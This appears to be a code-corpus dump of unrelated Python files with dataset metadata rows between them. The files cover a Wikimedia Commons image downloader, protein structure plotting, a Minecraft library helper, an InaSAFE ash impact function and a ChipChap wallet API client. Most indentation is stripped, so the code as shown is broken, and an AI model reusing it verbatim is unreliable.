logging.info("Start loading images for category '%s'", category)
for el in filelist:
if el['status'] != 'downloaded':
el['status'] = 'downloaded'
if not os.path.exists(el['category']):
os.makedirs(el['category'])
get_image(el['filename'],
pixels,
os.path.join(el['category'], el['filename']))
with open(file_path, 'w') as fp:
json.dump(filelist, fp, indent=2)
logging.info('Done loading files.')
def get_direct_files(category):
"""Get a list of all files in category."""
filelist = []
has_continue = True
data = {}
while has_continue:
base_url = "https://commons.wikimedia.org/w/api.php"
url = ("{base_url}?action=query&list=categorymembers&cmtype=file"
"&format=json"
"&cmtitle={category}"
.format(base_url=base_url,
category=urllib.quote_plus(category.encode('utf-8'))))
if 'continue' in data:
url += "&cmcontinue=%s" % data['continue']['cmcontinue']
response = urllib2.urlopen(url)
jsondata = response.read()
data = json.loads(jsondata)
for el in data['query']['categorymembers']:
filename = el['title'][len("File:"):]
filelist.append({'filename': filename,
'category': category})
has_continue = 'continue' in data
return filelist
def get_file_details(commons_name):
"""
    Get the categories and thumbnail URL of a single file.
Parameters
----------
commons_name : str
Returns
-------
dict
Examples
--------
>>> get_file_details('Aurelia-aurita-3.jpg')
"""
base_url = "https://tools.wmflabs.org/magnus-toolserver/commonsapi.php"
url = ("{base_url}?image={image}&thumbwidth={pixels}&thumbheight={pixels}"
.format(base_url=base_url,
image=urllib.quote_plus(commons_name.encode('utf-8')),
pixels=128))
while True:
try:
response = urllib2.urlopen(url)
        except urllib2.URLError:
            # transient network failure: retry until the API responds
            continue
break
xmldata = response.read()
xmldict = xmltodict.parse(xmldata)
return {'categories': xmldict['response']['categories']['category'],
'img_url': xmldict['response']['file']['urls']['thumbnail']}
def get_image(commons_name, pixels, local_filename):
"""
Get a single image from Wikipedia Commons.
Parameters
----------
commons_name : str
pixels : int
Maximum dimension for both width and height
local_filename : str
Path where the image gets saved.
Returns
-------
None
Examples
--------
>>> get_image('Aurelia-aurita-3.jpg', 250, 'local_name.jpg')
>>> get_image('Aurelia-aurita-3.jpg', 500, 'local_name_500.jpg')
"""
base_url = "https://tools.wmflabs.org/magnus-toolserver/commonsapi.php"
url = ("{base_url}?image={image}&thumbwidth={pixels}&thumbheight={pixels}"
.format(base_url=base_url,
image=urllib.quote_plus(commons_name.encode('utf-8')),
pixels=pixels))
response = urllib2.urlopen(url)
xmldata = response.read()
xmldict = xmltodict.parse(xmldata)
img_url = xmldict['response']['file']['urls']['thumbnail']
urllib.urlretrieve(img_url, local_filename)
def download_complete_category(category, pixels, local_folder='.'):
"""
Download all files of a category (recursive).
Parameters
----------
category : string
pixels : int
Maximum size of dimensions of image
Examples
--------
>>> download_complete_category("Category:Ipomoea", 128)
"""
directory = category[len("Category:"):]
store_here = os.path.join(local_folder, directory)
if not os.path.exists(store_here):
os.makedirs(store_here)
download_category_files(category, pixels, store_here)
sub_categories = get_subcategories(category)
for sub_cat in sub_categories:
download_complete_category(sub_cat, pixels, store_here)
def download_category_files(category, pixels, local_folder='.'):
"""
Download all files of a category (non-recursive).
Parameters
----------
category : string
pixels : int
Maximum size of dimensions of image
local_folder : string
Put files here.
Examples
--------
>> download_category_files("Category:Close-ups of Ipomoea flowers", 128)
"""
base_url = "https://commons.wikimedia.org/w/api.php"
url = ("{base_url}?action=query&list=categorymembers&cmtype=file"
"&format=json"
"&cmtitle={category}"
.format(base_url=base_url,
category=urllib.quote_plus(category.encode('utf-8'))))
response = urllib2.urlopen(url)
jsondata = response.read()
data = json.loads(jsondata)
for el in data['query']['categorymembers']:
filename = el['title'][len("File:"):]
logging.info(filename)
get_image(filename, pixels, os.path.join(local_folder, filename))
def get_subcategories(category):
"""
Get names of subcategories.
Parameters
----------
category : string
Returns
-------
list
Titles of all subcategories.
Examples
--------
>>> get_subcategories("Category:Ipomoea")[0]
u'Category:Close-ups of Ipomoea flowers'
"""
base_url = "https://commons.wikimedia.org/w/api.php"
url = ("{base_url}?action=query&list=categorymembers&cmtype=subcat"
"&format=json"
"&cmtitle={category}"
.format(base_url=base_url,
category=urllib.quote_plus(category.encode('utf-8'))))
response = urllib2.urlopen(url)
jsondata = response.read()
data = json.loads(jsondata)
cats = [el['title'] for el in data['query']['categorymembers']]
return cats
if __name__ == '__main__':
import doctest
doctest.testmod()
| mit | 1,034,184,928,926,527,400 | 29.55914 | 78 | 0.574478 | false | 3.943571 | false | false | false |
hmc-cs-rkretsch/Secondary-Protein-Structure | Program/lit_analysis.py | 1 | 11131 | # -*- coding: utf-8 -*-
"""
Author: Rachael Kretsch
Big Data Final Project
Secondary Protein Structure
analyse the literature data!!
"""
import pickle
import numpy as np
import matplotlib.pyplot as plt
from sklearn import linear_model
#==============================================================================
#
# struct_file = '../Data/color_fasta.txt' + "_struct_data.pik"
# with open(struct_file, 'rb') as f:
# structures, sequences = pickle.load(f)
#
# new_file = '../Data/color_fasta.txt' + "_seqs_data.pik"
# with open(new_file, 'rb') as f:
# sequences_2,seqids,names,descriptions = pickle.load(f)
#
# good_seqids=['1bfp','3ekh','3ned','4k3g','3cfc',
# '1xkh','2wht','4w6b','4xvp','3dqh',
# '1bgp','4q7t','4qgw','5h88','4l1s',
# '5h89','3s0f','4q9w','3rwt','5hzo']
#
# s2D_accuracies = {}
# s2D_accuracy = 0
#
# j=-1
#
# s2D_predictions = []
# for seqid in seqids:
# j+=1
# if seqid in good_seqids:
# struct = structures[j]
# i=0
# prediction = []
# for line in open('../Data/S2D/'+seqid + '_s2d_out.txt'):
# if line[0]!='>' and line[0]!='#':
# if i<11:
# pred = line[40]
# elif i<101:
# pred= line[41]
# else:
# pred = line[42]
# if pred=='H':
# prediction+=[1]
# elif pred=='E':
# prediction+=[-1]
# else:
# prediction+=[0]
# i+=1
# print(seqid)
# x = range(len(prediction))
# beta = []
# alpha = []
# coil = []
# for amino in prediction:
# if amino == -1:
# beta += [1]
# alpha += [0]
# coil += [0]
# elif amino == 1:
# beta += [0]
# alpha += [1]
# coil += [0]
# else:
# beta += [0]
# alpha += [0]
# coil += [1]
# plt.scatter(x,beta,label='beta',marker = 'o',color='blue')
# plt.scatter(x,coil,label='coil',marker='x', color='green')
# plt.scatter(x,alpha,label='alpha',color='red')
# plt.title('Secondary structure prediction s2D '+seqid)
# plt.xlabel('Amino acid position')
# plt.ylabel('Probability')
# lgd = plt.legend(bbox_to_anchor=(1.05, 1), loc=2)
# ax=plt.gca()
# fig = plt.gcf()
# fig.set_size_inches
# ax.set_xlim([0,len(prediction)])
# ax.set_ylim([0.9,1.1])
# plt.savefig('../Data/S2D/'+seqid+'_actual.png',bbox_extra_artists=(lgd,),dpi=600,bbox_inches='tight')
# plt.close()
# s2D_predictions+=[[beta,coil,alpha]]
# struct=struct[:len(prediction)]
# acc=(np.array(prediction)==np.array(struct)).sum()/len(prediction)
# s2D_accuracy+=acc
# s2D_accuracies[seqid]=acc
#
# s2D_accuracy=s2D_accuracy/len(good_seqids)
# print("accuracy s2D: "+str(s2D_accuracy))
#
#
# SOPM_accuracies = {}
# SOPM_accuracy = 0
#
# j=-1
#
# SOPM_predictions=[]
# for seqid in seqids:
# j+=1
# if seqid in good_seqids:
# struct = structures[j]
# prediction = []
# for line in open('../Data/SOPM/'+seqid + '.sopm.txt'):
# if line[0]in ['H','C','E'] and len(prediction)<len(struct):
# pred = line[0]
# if pred=='H':
# prediction+=[1]
# elif pred=='E':
# prediction+=[-1]
# else:
# prediction+=[0]
# print(seqid)
#
# x = range(len(prediction))
# beta = []
# alpha = []
# coil = []
# for amino in prediction:
# if amino == -1:
# beta += [1]
# alpha += [0]
# coil += [0]
# elif amino == 1:
# beta += [0]
# alpha += [1]
# coil += [0]
# else:
# beta += [0]
# alpha += [0]
# coil += [1]
# plt.scatter(x,beta,label='beta',marker = 'o',color='blue')
# plt.scatter(x,coil,label='coil',marker='x', color='green')
# plt.scatter(x,alpha,label='alpha',color='red')
# plt.title('Secondary structure prediction SOPM '+seqid)
# plt.xlabel('Amino acid position')
# plt.ylabel('Probability')
# lgd = plt.legend(bbox_to_anchor=(1.05, 1), loc=2)
# ax=plt.gca()
# fig = plt.gcf()
# fig.set_size_inches
# ax.set_xlim([0,len(prediction)])
# ax.set_ylim([0.9,1.1])
# plt.savefig('../Data/SOPM/'+seqid+'_actual.png',bbox_extra_artists=(lgd,),dpi=600,bbox_inches='tight')
# plt.close()
#
# SOPM_predictions+=[[beta,coil,alpha]]
# struct=struct[:len(prediction)]
# acc=(np.array(prediction)==np.array(struct)).sum()/len(prediction)
# SOPM_accuracy+=acc
# SOPM_accuracies[seqid]=acc
#
# SOPM_accuracy=SOPM_accuracy/len(good_seqids)
# print("accuracy SOPM: "+str(SOPM_accuracy))
# GOR4_accuracies = {}
# GOR4_accuracy = 0
#
# j=-1
#
# GOR4_predictions = []
# for seqid in seqids:
# j+=1
# if seqid in good_seqids:
# struct = structures[j]
# prediction = []
# for line in open('../Data/GORIV/'+seqid + '.gor4.mpsa.txt'):
# if line[0]in ['H','C','E'] and len(prediction)<len(struct):
# pred = line[0]
# if pred=='H':
# prediction+=[1]
# elif pred=='E':
# prediction+=[-1]
# else:
# prediction+=[0]
# print(seqid)
#
# x = range(len(prediction))
# beta = []
# alpha = []
# coil = []
# for amino in prediction:
# if amino == -1:
# beta += [1]
# alpha += [0]
# coil += [0]
# elif amino == 1:
# beta += [0]
# alpha += [1]
# coil += [0]
# else:
# beta += [0]
# alpha += [0]
# coil += [1]
# plt.scatter(x,beta,label='beta',marker = 'o',color='blue')
# plt.scatter(x,coil,label='coil',marker='x', color='green')
# plt.scatter(x,alpha,label='alpha',color='red')
# plt.title('Secondary structure prediction GOR4 '+seqid)
# plt.xlabel('Amino acid position')
# plt.ylabel('Probability')
# lgd = plt.legend(bbox_to_anchor=(1.05, 1), loc=2)
# ax=plt.gca()
# fig = plt.gcf()
# fig.set_size_inches
# ax.set_xlim([0,len(prediction)])
# ax.set_ylim([0.9,1.1])
# plt.savefig('../Data/GORIV/'+seqid+'_actual.png',bbox_extra_artists=(lgd,),dpi=600,bbox_inches='tight')
# plt.close()
#
# GOR4_predictions+=[[beta,coil,alpha]]
# struct=struct[:len(prediction)]
# acc=(np.array(prediction)==np.array(struct)).sum()/len(prediction)
# GOR4_accuracy+=acc
# GOR4_accuracies[seqid]=acc
#
# GOR4_accuracy=GOR4_accuracy/len(good_seqids)
# print("accuracy GORIV: "+str(GOR4_accuracy))
#
#
# data_file = '../Data/color_fasta.txt' + "_data.pik"
# with open(data_file, 'rb') as f:
# data = pickle.load(f)
#
# np.random.shuffle(data)
#
# data_test, data_train = data[:len(data)/4,:], data[len(data)/4:,:]
#
# x_train = data_train[:,1:]
# y_train = data_train[:,:1]
# x_test = data_test[:,1:]
# y_test = data_test[:,:1]
#
#
# logreg = linear_model.LogisticRegression(C=3.4)
# logreg.fit(x_train,y_train)
# data_file = '../Data/color_fasta.txt' + "_data.pik"
# with open(data_file, 'rb') as f:
# data_full = pickle.load(f)
#
# x_full = data_full[:,1:]
# y_full = data_full[:,:1]
# result_full = logreg.predict(x_full)
#
#
#==============================================================================
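# NOTE: the live code below assumes the commented-out pipeline above has
# already been executed in the same session (e.g. interactively), so that
# seqids, good_seqids, sequences, structures, result_full and the
# *_predictions lists are defined; run on its own it would raise NameError.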
j=-1
i=0
k=-1
for seqid in seqids:
j+=1
if seqid in good_seqids:
k+=1
x = range(len(structures[j]))
beta_real =[]
alpha_real = []
coil_real = []
for amino in structures[j]:
if amino == -1:
beta_real += [1]
alpha_real += [0]
coil_real += [0]
elif amino == 1:
beta_real += [0]
alpha_real += [1]
coil_real += [0]
else:
beta_real += [0]
alpha_real += [0]
coil_real += [1]
plt.scatter(x,beta_real,label='beta_real',marker = 'o',color='blue')
plt.scatter(x,coil_real,label='coil_real',marker='x', color='green')
plt.scatter(x,alpha_real,label='alpha_real',color='red')
log_ = result_full[i:i+len(sequences[j])]
beta_log =[]
alpha_log = []
coil_log = []
for amino in log_:
if amino == -1:
beta_log += [0.9]
alpha_log += [0]
coil_log += [0]
elif amino == 1:
beta_log += [0]
alpha_log += [0.9]
coil_log += [0]
else:
beta_log += [0]
alpha_log += [0]
coil_log += [0.9]
plt.scatter(x,beta_log,label='beta_log',marker = 'o',color='blue')
plt.scatter(x,coil_log,label='coil_log',marker='x', color='green')
plt.scatter(x,alpha_log,label='alpha_log',color='red')
GOR4 = np.array(GOR4_predictions[k])*0.8
x = range(len(GOR4[0]))
plt.scatter(x,GOR4[0],label='beta_GOR4',marker = 'o',color='blue')
plt.scatter(x,GOR4[1],label='coil_GOR4',marker='x', color='green')
plt.scatter(x,GOR4[2],label='alpha_GOR4',color='red')
SOPM = np.array(SOPM_predictions[k])*0.7
x = range(len(SOPM[0]))
plt.scatter(x,SOPM[0],label='beta_SOPM',marker = 'o',color='blue')
plt.scatter(x,SOPM[1],label='coil_SOPM',marker='x', color='green')
plt.scatter(x,SOPM[2],label='alpha_SOPM',color='red')
s2D = np.array(s2D_predictions[k])*0.6
x = range(len(s2D[0]))
plt.scatter(x,s2D[0],label='beta_s2D',marker = 'o',color='blue')
plt.scatter(x,s2D[1],label='coil_s2D',marker='x', color='green')
plt.scatter(x,s2D[2],label='alpha_s2D',color='red')
plt.title('Secondary structure prediction '+seqid)
plt.xlabel('Amino acid position')
plt.ylabel('Probability')
lgd = plt.legend(bbox_to_anchor=(1.05, 1), loc=2)
ax=plt.gca()
fig = plt.gcf()
fig.set_size_inches
ax.set_xlim([0,len(x)])
ax.set_ylim([0.5,1.1])
plt.savefig('../Data/'+seqid+'.png',bbox_extra_artists=(lgd,),dpi=600,bbox_inches='tight')
plt.close()
i+=len(sequences[j])
| mit | 8,593,575,227,235,875,000 | 31.931953 | 113 | 0.465008 | false | 3.00027 | false | false | false |
LambolAlee/LAminec | cli_module/Kaminec/jsontools/promotions/GamePromotions.py | 1 | 1431 | from string import Template
from collections import namedtuple
from ..LibItem import make_comp_items
from ..system import Rule, getStartCodeTemplate, NATIVEKEY
ORDLIBFORM = "{0}/{1}/{2}/{1}-{2}.jar"
NATIVELIBFORM = "{0}/{1}/{2}/{1}-{2}-{3}.jar"
class MCPromotNormal:
'''promotion to minecraft 1.12.2 and earlier.'''
def __init__(self, version):
self.version = version
@property
def version(self):
return self._version
@version.setter
def version(self, version):
self._version = version
def initLibs(self, lib_data, conf, include_native=False):
return make_comp_items(lib_data, conf=conf, include_native=include_native)
def initMcArgs(self, args_data):
return Template(args_data)
def initStartCode(self):
return Template(getStartCodeTemplate())
class MCPromotForge(MCPromotNormal):
def __init__(self, version):
super(MCPromotForge, self).__init__(version)
    # TODO: return these in the same form as initLibs builds them.
def initForgeLibs(self, forge_lib_data):
forge_list = []
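        # Each entry's "name" is a Maven coordinate of the form package:name:version.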
for forge_lib in forge_lib_data:
package, name, version = forge_lib["name"].split(':')
ord_forge_lib = ORDLIBFORM.format(package.replace('.', '/'), name, version)
forge_list.append(ord_forge_lib)
return forge_list
def initMcArgs(self, args_data):
return Template(args_data) | gpl-3.0 | 5,770,173,840,983,619,000 | 30.130435 | 87 | 0.649196 | false | 3.533333 | false | false | false |
easmetz/inasafe | safe/impact_functions/ash/ash_raster_places/impact_function.py | 1 | 9377 | # coding=utf-8
"""InaSAFE Disaster risk tool by Australian Aid - Tsunami Raster Impact on
Buildings
Contact : ole.moller.nielsen@gmail.com
.. note:: This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
"""
import logging
from safe.impact_functions.ash.ash_raster_places.metadata_definitions import \
AshRasterHazardPlacesFunctionMetadata
from safe.impact_functions.bases.continuous_rh_classified_ve import \
ContinuousRHClassifiedVE
from safe.storage.vector import Vector
from safe.common.exceptions import KeywordNotFoundError
from safe.utilities.i18n import tr
from safe.utilities.utilities import main_type
from safe.engine.interpolation import assign_hazard_values_to_exposure_data
from safe.impact_reports.place_exposure_report_mixin import (
PlaceExposureReportMixin)
__author__ = 'etienne'
__project_name__ = 'inasafe-dev'
__filename__ = 'impact_function.py'
__date__ = '7/13/16'
__copyright__ = 'etienne@kartoza.com'
LOGGER = logging.getLogger('InaSAFE')
class AshRasterPlaceFunction(
ContinuousRHClassifiedVE,
PlaceExposureReportMixin):
# noinspection PyUnresolvedReferences
"""Inundation raster impact on building data."""
_metadata = AshRasterHazardPlacesFunctionMetadata()
def __init__(self):
"""Constructor (calls ctor of base class)."""
super(AshRasterPlaceFunction, self).__init__()
PlaceExposureReportMixin.__init__(self)
self.hazard_classes = [
tr('Very Low'),
tr('Low'),
tr('Moderate'),
tr('High'),
tr('Very High'),
]
self.no_data_warning = False
def notes(self):
"""Return the notes section of the report.
:return: The notes that should be attached to this impact report.
:rtype: list
"""
# Range for ash hazard
group_parameters = self.parameters['group_threshold']
unaffected_max = group_parameters.value_map[
'unaffected_threshold']
very_low_max = group_parameters.value_map['very_low_threshold']
low_max = group_parameters.value_map['low_threshold']
medium_max = group_parameters.value_map['moderate_threshold']
high_max = group_parameters.value_map['high_threshold']
        fields = [
            tr('Unaffected zone is defined as ash depth of '
               '%.1f %s or less') % (
                unaffected_max.value,
                unaffected_max.unit.abbreviation),
            tr('Very Low ash hazard zone is defined as ash depth '
               'more than %.1f %s but less than %.1f %s') % (
                unaffected_max.value,
                unaffected_max.unit.abbreviation,
                very_low_max.value,
                very_low_max.unit.abbreviation),
            tr('Low ash hazard zone is defined as ash depth '
               'more than %.1f %s but less than %.1f %s') % (
                very_low_max.value,
                very_low_max.unit.abbreviation,
                low_max.value,
                low_max.unit.abbreviation),
            tr('Moderate ash hazard zone is defined as ash depth '
               'more than %.1f %s but less than %.1f %s') % (
                low_max.value,
                low_max.unit.abbreviation,
                medium_max.value,
                medium_max.unit.abbreviation),
            tr('High ash hazard zone is defined as ash depth '
               'more than %.1f %s but less than %.1f %s') % (
                medium_max.value,
                medium_max.unit.abbreviation,
                high_max.value,
                high_max.unit.abbreviation),
            tr('Very High ash hazard zone is defined as ash depth '
               'more than %.1f %s') % (
                high_max.value, high_max.unit.abbreviation)
        ]
# include any generic exposure specific notes from definitions.py
fields = fields + self.exposure_notes()
# include any generic hazard specific notes from definitions.py
fields = fields + self.hazard_notes()
return fields
def run(self):
"""Tsunami raster impact to buildings (e.g. from Open Street Map)."""
# Range for ash hazard
group_parameters = self.parameters['group_threshold']
unaffected_max = group_parameters.value_map[
'unaffected_threshold'].value
very_low_max = group_parameters.value_map['very_low_threshold'].value
low_max = group_parameters.value_map['low_threshold'].value
medium_max = group_parameters.value_map['moderate_threshold'].value
high_max = group_parameters.value_map['high_threshold'].value
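        # Unlike notes(), run() works with the plain float values of the
        # thresholds (ash depth).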
# Interpolate hazard level to building locations
interpolated_layer = assign_hazard_values_to_exposure_data(
self.hazard.layer,
self.exposure.layer,
attribute_name=self.target_field)
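        # Each exposure feature now carries the sampled hazard value in
        # the attribute named by self.target_field.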
# Extract relevant exposure data
features = interpolated_layer.get_data()
total_features = len(interpolated_layer)
try:
population_field = self.exposure.keyword('population_field')
except KeywordNotFoundError:
population_field = None
# required for real time
self.exposure.keyword('name_field')
structure_class_field = self.exposure.keyword('structure_class_field')
exposure_value_mapping = self.exposure.keyword('value_mapping')
self.init_report_var(self.hazard_classes)
for i in range(total_features):
            # Get the interpolated ash depth for this feature
            ash_hazard_zone = float(features[i][self.target_field])

            # Classify into a hazard class index, keeping the ranges
            # consistent with self.hazard_classes and the legend defined
            # in style_classes below.
            if ash_hazard_zone <= unaffected_max:
                current_hash_zone = 0  # not affected, grouped with very low
            elif unaffected_max < ash_hazard_zone <= very_low_max:
                current_hash_zone = 0  # very low
            elif very_low_max < ash_hazard_zone <= low_max:
                current_hash_zone = 1  # low
            elif low_max < ash_hazard_zone <= medium_max:
                current_hash_zone = 2  # moderate
            elif medium_max < ash_hazard_zone <= high_max:
                current_hash_zone = 3  # high
            elif high_max < ash_hazard_zone:
                current_hash_zone = 4  # very high
            else:
                # Not a number or a value outside the real range.
                current_hash_zone = 0
usage = features[i].get(structure_class_field, None)
usage = main_type(usage, exposure_value_mapping)
# Add calculated impact to existing attributes
features[i][self.target_field] = current_hash_zone
category = self.hazard_classes[current_hash_zone]
if population_field is not None:
population = float(features[i][population_field])
else:
population = 1
self.classify_feature(category, usage, population, True)
self.reorder_dictionaries()
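        # One style class per hazard class; the depth ranges in the labels
        # must match the classification above.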
style_classes = [
dict(
label=self.hazard_classes[0] + ': >%.1f - %.1f cm' % (
unaffected_max, very_low_max),
value=0,
colour='#00FF00',
transparency=0,
size=1
),
dict(
label=self.hazard_classes[1] + ': >%.1f - %.1f cm' % (
very_low_max, low_max),
value=1,
colour='#FFFF00',
transparency=0,
size=1
),
dict(
label=self.hazard_classes[2] + ': >%.1f - %.1f cm' % (
low_max, medium_max),
value=2,
colour='#FFB700',
transparency=0,
size=1
),
dict(
label=self.hazard_classes[3] + ': >%.1f - %.1f cm' % (
medium_max, high_max),
value=3,
colour='#FF6F00',
transparency=0,
size=1
),
dict(
                label=self.hazard_classes[4] + ': >%.1f cm' % high_max,
value=4,
colour='#FF0000',
transparency=0,
size=1
),
]
style_info = dict(
target_field=self.target_field,
style_classes=style_classes,
style_type='categorizedSymbol')
impact_data = self.generate_data()
extra_keywords = {
'target_field': self.target_field,
'map_title': self.metadata().key('map_title'),
'legend_title': self.metadata().key('legend_title'),
'legend_units': self.metadata().key('legend_units'),
}
impact_layer_keywords = self.generate_impact_keywords(extra_keywords)
impact_layer = Vector(
data=features,
projection=interpolated_layer.get_projection(),
geometry=interpolated_layer.get_geometry(),
name=self.metadata().key('layer_name'),
keywords=impact_layer_keywords,
style_info=style_info)
impact_layer.impact_data = impact_data
self._impact = impact_layer
return impact_layer
| gpl-3.0 | -7,679,573,764,815,955,000 | 36.658635 | 78 | 0.569798 | false | 4.059307 | false | false | false |
FreedomCoop/valuenetwork | multicurrency/utils.py | 1 | 11766 | import requests
import time
import hashlib
import hmac
import logging
import logging.handlers
import json
from random import randint
from base64 import b64decode
from django.conf import settings
from django.forms import ValidationError
class ChipChapAuthError(Exception):
def __init__(self, message, errors):
super(ChipChapAuthError, self).__init__(message)
self.errors = errors
class ChipChapAuthConnection(object):
def __init__(self):
self.logger = self.init_logger()
if 'client_id' in settings.MULTICURRENCY:
self.able_to_connect = True
cdata = settings.MULTICURRENCY
self.client_id = cdata['client_id']
self.client_secret = cdata['client_secret']
self.access_key = cdata['access_key']
self.access_secret = cdata['access_secret']
self.url_new_user = cdata['url_new_user']
self.url_client = cdata['url_client']
self.url_history = cdata['url_history']
self.url_balance = cdata['url_balance']
            if 'ocp_api_key' not in cdata:  # cdata is a dict, so hasattr() would never find the key
self.ocp_api_key = None
#raise ValidationError("Is needed the API key given by BotC wallet to this platform (settings).")
print("WARN: Multiwallet Read-Only! To make payments is needed the API key given by OCP to the BotC wallet platform (in local_settings).")
self.logger.error("WARN: Multiwallet Read-Only! To make payments is needed the API key given by OCP to the BotC wallet platform (in local_settings).")
else:
self.ocp_api_key = cdata['ocp_api_key']
self.logger.info("Connected with an OCP api-key for safe access.")
if not hasattr(cdata, "url_w2w"):
self.url_w2w = None
print("WARN: Multiwallet without W2W permissions! Can't let users pay the shares...")
self.logger.error("WARN: Multiwallet without W2W permissions! Can't let users pay the shares...")
else:
self.url_w2w = cdata['url_w2w']
if not "url_ticker" in cdata:
self.url_ticker = None
print("WARN: Multicurrency without Ticker! Can't process crypto prices (except faircoin)")
self.logger.error("WARN: Multicurrency without Ticker! Can't process crypto prices (except faircoin)")
else:
self.url_ticker = cdata['url_ticker']
#if not "url_tx_json" in cdata:
# self.url_tx_json = None
# print("WARN: Multicurrency without url_tx_json! Can't check crypto payments")
# self.logger.error("WARN: Multicurrency without url_tx_json! Can't check crypto payments")
#else:
# self.url_tx_json = cdata['url_tx_json']
self.url_fair_tx = cdata['url_fair_tx']
else:
self.able_to_connect = False
self.logger.critical("Invalid configuration data to connect.")
@classmethod
def get(cls):
return cls()
@classmethod
def init_logger(cls):
logger = logging.getLogger("multicurrency")
logger.setLevel(logging.WARNING)
if 'log_file' in settings.MULTICURRENCY:
fhpath = settings.MULTICURRENCY["log_file"]
else:
fhpath = "/".join(
[settings.PROJECT_ROOT, "multicurrency.log", ])
fh = logging.handlers.TimedRotatingFileHandler(
fhpath, when="d", interval=1, backupCount=7)
fh.setLevel(logging.DEBUG)
formatter = logging.Formatter(
'%(asctime)s - %(levelname)s - %(message)s',
datefmt='%Y-%m-%d %H:%M:%S')
fh.setFormatter(formatter)
logger.addHandler(fh)
return logger
@classmethod
def chipchap_x_signature(cls, access_key, access_secret):
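        # Restore base64 padding: stored secrets may arrive with the
        # trailing '=' characters stripped.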
if len(access_secret) % 4:
access_secret += '=' * (4 - len(access_secret) % 4)
nonce = str(randint(0, 100000000))
timestamp = str(int(time.time()))
string_to_sign = access_key + nonce + timestamp
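        # Sign the concatenated key/nonce/timestamp with HMAC-SHA256,
        # keyed by the base64-decoded secret.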
signature = hmac.new(
b64decode(access_secret),
bytes(str(string_to_sign).encode("utf-8")),
hashlib.sha256).hexdigest()
headers = {
'X-Signature': 'Signature access-key="' + access_key +
'", nonce="' + nonce + '", timestamp="' + timestamp +
'", version="2", signature="' + signature + '"'}
return headers
def new_chipchap_user(self, username, email, company_name, password,
repassword):
if not self.able_to_connect:
raise ChipChapAuthError('Connection Error', 'No data to connect')
headers = ChipChapAuthConnection.chipchap_x_signature(
self.access_key, self.access_secret)
data = {
'username': username,
'email': email,
'company_name': company_name,
'password': password,
'repassword': repassword,
}
response = requests.post(self.url_new_user, headers=headers, data=data)
if int(response.status_code) == 201:
self.logger.info("New chipchap user request for " + username
+ " has been succesfully processed.")
return response.json()
else:
msg = response.json()
self.logger.critical(
"New chipchap user request for " + username + " has returned "
+ str(response.status_code) + " status code. Error: "
+ response.text)
raise ChipChapAuthError(
'Error ' + str(response.status_code)
+ ': ' + msg['message'], response.text)
def new_client(self, username, password):
if not self.able_to_connect:
raise ChipChapAuthError('Connection Error', 'No data to connect')
headers = ChipChapAuthConnection.chipchap_x_signature(
self.access_key, self.access_secret)
data = {
'client_id': self.client_id,
'client_secret': self.client_secret,
'username': username,
'password': password,
}
response = requests.post(self.url_client, headers=headers, data=data)
if int(response.status_code) == 200:
return response.json()
else:
self.logger.critical(
"Authentication request for " + username + " has returned "
+ str(response.status_code) + " status code. Error: "
+ response.text)
raise ChipChapAuthError(
'Error ' + str(response.status_code), response.text)
def wallet_history(self, access_key, access_secret, limit=10, offset=0):
if not self.able_to_connect:
raise ChipChapAuthError('Connection Error', 'No data to connect')
headers = ChipChapAuthConnection.chipchap_x_signature(
access_key, access_secret)
params = {
"limit": limit,
"offset": offset,
}
tx_list = requests.get(
self.url_history, headers=headers, params=params)
balance = requests.get(self.url_balance, headers=headers)
if int(tx_list.status_code) == 200 and int(balance.status_code) == 200:
return tx_list.json(), balance.json()
else:
error = str(balance.status_code) + ' and ' + str(
tx_list.status_code)
msg = balance.text + ' and ' + tx_list.text
self.logger.critical("Balance and history requests have returned "
+ error + " status codes. Error: " + msg)
raise ChipChapAuthError('Error ' + error, msg)
def wallet_balance(self, access_key, access_secret):
if not self.able_to_connect:
raise ChipChapAuthError('Connection Error', 'No data to connect')
headers = ChipChapAuthConnection.chipchap_x_signature(
access_key, access_secret)
balance = requests.get(self.url_balance, headers=headers)
if int(balance.status_code) == 200:
return balance.json()
else:
error = str(balance.status_code)
msg = balance.text
self.logger.critical("Balance request have returned "
+ error + " status code. Error: " + msg)
raise ChipChapAuthError('Error ' + error, msg)
def send_w2w(self, access_key, access_secret, unit, amount, username, scale):
if not self.able_to_connect:
raise ChipChapAuthError('Connection Error', 'No data to connect')
headers = ChipChapAuthConnection.chipchap_x_signature(
access_key, access_secret)
        # NOTE: assumed w2w parameter names, taken from the method signature;
        # adjust to the actual wallet API if it differs.
        params = {
            'amount': amount,
            'username': username,
            'scale': scale,
        }
        payment = requests.get(self.url_w2w + unit, headers=headers, params=params)
if int(payment.status_code) == 200:
return payment.json()
else:
error = str(payment.status_code)
msg = payment.text
self.logger.critical("Payment w2w request have returned "
+ error + " status code. Error: " + msg)
raise ChipChapAuthError('Error ' + error, msg)
def check_payment(self, access_key, access_secret, unit, txid):
if not self.able_to_connect:
raise ChipChapAuthError('Connection Error', 'No data to connect')
        mtx = None
        status = None  # stays None if the wallet history yields nothing
txlist, balance = self.wallet_history(access_key, access_secret, 20)
if txlist:
status = txlist['status']
if status == 'ok':
for tx in txlist['data']['elements']:
if tx['id'] == txid:
mtx = tx
if not mtx:
print("Can't find the mtxid in last 20, search olders??")
self.logger.info("Can't find the mtxid in last 20, search olders??")
if not mtx:
txlist, balance = self.wallet_history(access_key, access_secret, 200)
if txlist:
status = txlist['status']
if status == 'ok':
for tx in txlist['data']['elements']:
if tx['id'] == txid:
mtx = tx
if not mtx:
print("Can't find the mtxid in last 200, search olders??")
self.logger.info("Can't find the mtxid in last 200, search olders??")
return mtx, status
"""
headers = ChipChapAuthConnection.chipchap_x_signature(
access_key, access_secret)
if unit == 'fair':
unit = 'fac'
url = self.url_multi_txs # self.url_fair_tx+txid
else:
url = self.url_tx_json+(unit)+'/'+txid
params = {
'currency': unit,
'id': txid,
}
paycheck = requests.get(
url,
headers=headers)
#params=params)
print("URL: "+str(url))
#print("Headers: "+str(headers))
if int(paycheck.status_code) == 200:
self.logger.debug('Response (200) json:'+str(paycheck.json()))
print('Response (200) json:'+str(paycheck.json()))
return None, paycheck.json() # TODO
else:
error = str(paycheck.status_code)
#msg = paycheck.json()['message'] #json.loads(paycheck.text)
msg = paycheck.text
self.logger.error("Payment check request have returned "+error+" status code. Error: "+msg)
print("Payment check request have returned "+error+" status code. Error: "+msg)
return None, msg
#raise ChipChapAuthError('Error '+error, msg['message'])
"""
